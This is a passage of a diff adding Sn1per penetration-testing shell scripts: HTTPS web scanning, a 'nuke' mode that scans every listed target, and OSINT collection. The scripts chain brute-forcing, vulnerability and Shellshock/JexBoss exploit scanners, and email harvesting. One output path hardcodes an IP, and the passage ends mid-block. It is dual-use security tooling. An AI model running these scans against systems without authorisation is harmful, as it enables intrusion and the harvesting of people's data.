ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
fi

196
modes/normal_webporthttps.sh Normal file
View File

@@ -0,0 +1,196 @@
if [[ "$MODE" = "web" ]]; then
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$PASSIVE_SPIDER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2022-33-index?url=*.$TARGET&output=json" -H 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36' 2> /dev/null | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$WAYBACKMACHINE" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$HACKERTARGET" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING HACKERTARGET URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s GET "https://api.hackertarget.com/pagelinks/?q=https://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid|error getting links" | tee $LOOT_DIR/web/hackertarget-https-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$GAU" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING GUA URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
gau -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$BLACKWIDOW" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
blackwidow -u https://$TARGET:443 -l 3 -v n
cp -f /usr/share/blackwidow/"$TARGET"_443/"$TARGET"_443-*.txt $LOOT_DIR/web/ 2>/dev/null
cat /usr/share/blackwidow/"$TARGET"_*/"$TARGET"_*-urls-sorted.txt > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/hackertarget-*-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
mv -f $LOOT_DIR/web/spider-$TARGET.txtr $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/web/spider-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/spider-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
head -n 20 $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" && "SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
fi
fi
if [[ "$INJECTX" == "1" ]]; then
rm -f $LOOT_DIR/web/injectx-$TARGET-https.raw 2> /dev/null
for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "https\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "https\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https.raw; done; done;
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/injectx-$TARGET-https.raw 2> /dev/null > $LOOT_DIR/web/injectx-$TARGET-https.txt
fi
source $INSTALL_DIR/modes/static-grep-search.sh
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
source $INSTALL_DIR/modes/javascript-analysis.sh
fi
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
if [[ "$WEB_BRUTE_COMMONSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u https://$TARGET -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-common.txt
fi
fi
if [[ "$WEB_BRUTE_FULLSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u https://$TARGET -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-full.txt
fi
fi
if [[ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-exploits.txt
fi
fi
if [[ "$DIRSEARCH" == "1" ]]; then
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
mv $LOOT_DIR/web/dirsearch-$TARGET.sorted $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null > $LOOT_DIR/web/dirsearch-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/dirsearch-new-$TARGET.txt| awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
fi
fi
if [[ "$GOBUSTER" == "1" ]]; then
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
wget --connect-timeout=5 --read-timeout=10 --tries=1 https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
if [[ "$CLUSTERD" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
clusterd --ssl -i $TARGET 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-https.txt
fi
if [[ "$CMSMAP" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cmsmap https://$TARGET | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsa.txt
echo ""
cmsmap https://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsb.txt
echo ""
fi
if [[ "$WPSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$WP_API_KEY" ]]; then
wpscan --url https://$TARGET --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port443a.txt
echo ""
wpscan --url https://$TARGET/wordpress/ --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port443b.txt
echo ""
else
wpscan --url https://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port443a.txt
echo ""
wpscan --url https://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port443b.txt
echo ""
fi
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-https-port443a.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-https-port443a.txt
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-https-port443b.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-https-port443b.txt
rm -f $LOOT_DIR/web/wpscan-$TARGET-http*.raw 2> /dev/null
fi
if [[ "$NIKTO" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nikto -h https://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http-port443.txt
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-http-port443.txt
fi
if [[ "$SHOCKER" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --ssl --port 443 | tee $LOOT_DIR/web/shocker-$TARGET-port443.txt
fi
if [[ "$JEXBOSS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cd /tmp/
python3 /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET | tee $LOOT_DIR/web/jexboss-$TARGET-port443.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port443.raw > $LOOT_DIR/web/jexboss-$TARGET-port443.txt 2> /dev/null
rm -f $LOOT_DIR/web/jexboss-$TARGET-port443.raw 2> /dev/null
cd $INSTALL_DIR
fi
if [[ "$SMUGGLER" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 /usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u https://$TARGET | tee $LOOT_DIR/web/smuggler-$TARGET-port443.txt
fi
if [[ "$NUCLEI" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING NUCLEI SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nuclei -silent -t /usr/share/sniper/plugins/nuclei-templates/ -c $THREADS -target https://$TARGET -o $LOOT_DIR/web/nuclei-https-10.0.0.19-port443.txt
fi
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
fi

57
modes/nuke.sh Normal file
View File

@@ -0,0 +1,57 @@
# NUKE MODE #####################################################################################################
if [[ "$MODE" = "nuke" ]]; then
if [[ -z "$FILE" ]]; then
logo
echo "You need to specify a list of targets (ie. -f <targets.txt>) to scan."
exit
fi
if [[ "$REPORT" = "1" ]]; then
for a in `cat $FILE`;
do
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*] Saving loot to $WORKSPACE_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $WORKSPACE_DIR 2> /dev/null
mkdir $WORKSPACE_DIR/domains 2> /dev/null
mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
mkdir $WORKSPACE_DIR/nmap 2> /dev/null
mkdir $WORKSPACE_DIR/notes 2> /dev/null
mkdir $WORKSPACE_DIR/reports 2> /dev/null
mkdir $WORKSPACE_DIR/output 2> /dev/null
fi
args="$args --noreport --noloot"
TARGET="$a"
args="$args -t $TARGET -b"
echo -e "$OKRED "
echo -e "$OKRED ____"
echo -e "$OKRED __,-~~/~ \`---."
echo -e "$OKRED _/_,---( , )"
echo -e "$OKRED __ / < / ) \___"
echo -e "$OKRED - ------===;;;'====------------------===;;;===----- - -"
echo -e "$OKRED \/ ~'~'~'~'~'~\~'~)~'/"
echo -e "$OKRED (_ ( \ ( > \)"
echo -e "$OKRED \_( _ < >_>'"
echo -e "$OKRED ~ \`-i' ::>|--\""
echo -e "$OKRED I;|.|.|"
echo -e "$OKRED <|i::|i|\`."
echo -e "$OKRED (\` ^''\`-' ')"
echo -e "$OKRED --------------------------------------------------------- $RESET"
echo -e "$OKORANGE + -- --=[WARNING! Nuking ALL target! $RESET"
echo -e "$RESET"
if [[ ! -z "$WORKSPACE_DIR" ]]; then
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
else
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
fi
args=""
done
fi
if [[ "$LOOT" = "1" ]]; then
loot
fi
exit
fi

133
modes/osint.sh Normal file
View File

@@ -0,0 +1,133 @@
if [[ "$OSINT" = "1" ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$WHOIS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING WHOIS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$VERBOSE" == "1" ]]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN whois $TARGET 2> /dev/null | tee $LOOT_DIR/osint/whois-$TARGET.txt 2> /dev/null $RESET"
fi
whois $TARGET 2> /dev/null | tee $LOOT_DIR/osint/whois-$TARGET.txt 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_WHOIS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/whois-$TARGET.txt"
fi
fi
if [[ "$SPOOF_CHECK" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR EMAIL SECURITY $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
dig $TARGET txt | egrep -i 'spf|DMARC|dkim' | tee $LOOT_DIR/nmap/email-$TARGET.txt 2>/dev/null
dig iport._domainkey.${TARGET} txt | egrep -i 'spf|DMARC|DKIM' | tee -a $LOOT_DIR/nmap/email-$TARGET.txt 2>/dev/null
dig _dmarc.${TARGET} txt | egrep -i 'spf|DMARC|DKIM' | tee -a $LOOT_DIR/nmap/email-$TARGET.txt 2>/dev/null
echo ""
if [[ "$SLACK_NOTIFICATIONS_EMAIL_SECURITY" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/email-$TARGET.txt"
fi
fi
if [[ "$ULTRATOOLS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING ULTATOOLS DNS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s https://www.ultratools.com/tools/ipWhoisLookupResult\?ipAddress\=$TARGET | grep -A2 label | grep -v input | grep span | cut -d">" -f2 | cut -d"<" -f1 | sed 's/\&nbsp\;//g' 2> /dev/null | tee $LOOT_DIR/osint/ultratools-$TARGET.txt 2> /dev/null
fi
if [[ "$INTODNS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING DNS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wget -q http://www.intodns.com/$TARGET -O $LOOT_DIR/osint/intodns-$TARGET.html 2> /dev/null
echo -e "$OKRED[+]$RESET Report saved to: $LOOT_DIR/osint/intodns-$TARGET.html"
fi
if [[ "$THEHARVESTER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING THEHARVESTER OSINT INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cp -f /etc/theHarvester/api-keys.yaml ~/api-keys.yaml 2> /dev/null
cd ~ 2> /dev/null
theHarvester -d $TARGET -b all 2> /dev/null | tee $LOOT_DIR/osint/theharvester-$TARGET.txt 2> /dev/null
cd $INSTALL_DIR 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_THEHARVESTER" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/theharvester-$TARGET.txt"
fi
fi
if [[ "$EMAILFORMAT" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING EMAILS FROM EMAIL-FORMAT.COM $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s https://www.email-format.com/d/$TARGET| grep @$TARGET | grep -v div | sed "s/\t//g" | sed "s/ //g" 2> /dev/null | tee $LOOT_DIR/osint/email-format-$TARGET.txt 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_EMAIL_FORMAT" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/email-format-$TARGET.txt"
fi
fi
if [[ "$URLCRAZY" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING DNS ALTERATIONS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
urlcrazy $TARGET 2> /dev/null | tee $LOOT_DIR/osint/urlcrazy-$TARGET.txt 2> /dev/null
fi
if [[ "$METAGOOFIL" == "1" ]]; then
if [[ "$VERBOSE" == "1" ]]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null $RESET"
fi
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED COLLECTING OSINT FROM ONLINE DOCUMENTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cd $INSTALL_DIR/plugins/metagoofil/
python3 metagoofil.py -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null
cd $INSTALL_DIR
if [[ "$SLACK_NOTIFICATIONS_METAGOOFIL" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/metagoofil-$TARGET.txt"
fi
fi
if [[ "$URLSCANIO" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED COLLECTING OSINT FROM URLSCAN.IO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
